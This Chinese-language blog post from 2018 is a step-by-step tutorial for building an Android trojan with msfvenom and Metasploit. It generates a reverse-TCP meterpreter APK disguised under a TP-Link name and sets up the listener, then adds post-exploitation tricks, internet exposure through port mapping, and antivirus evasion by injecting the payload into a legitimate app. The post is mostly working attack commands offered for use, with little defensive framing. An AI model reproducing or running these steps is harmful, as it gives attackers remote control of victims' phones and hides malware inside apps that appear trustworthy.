普通版

kali中我们可以利用msfvenom来生成一个Android木马。命令如下:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk

这样便生成了一个名为TPLINK.apk的Android木马。
1.png
然后我们配合msfcosole进行攻击即可。

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LPORT 5555
exploit

手机端安装并执行,成功获得shell。

一些另外的玩法

给手机播放视频和音频文件(需更新到最新版的msf)

命令格式: paly /root/xxx.mp3 mp4
2.png

修改手机壁纸

background
use post/multi/manage/set_wallpaper
sessions
set sessions id
set WALLPAPER_FILE JPG
exploit

晋级玩法

利用armitage图形化管理工具
3.png

可视化的文件管理

4.png

骨灰级

外网木马

我们可以利用花生壳进行端口映射完成外网木马的渗透测试,添加端口如下!
5.png
然后在kali中设置花生壳的端口和ip地址即可。
那么!你还有那些另类的玩法呢?一起在下方交流吧。

木马免杀

对于以上的木马,是无法通过杀毒软件的查杀的,我们可以将payload加入到正常的APP中,来起来免杀的效果。
命令:

msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk

命令详解:
-x: 后跟原生态app
生成的kali.apk为新的木马文件。

视频演示

Last modification:December 30th, 2018 at 05:55 pm
正在沿街乞讨中……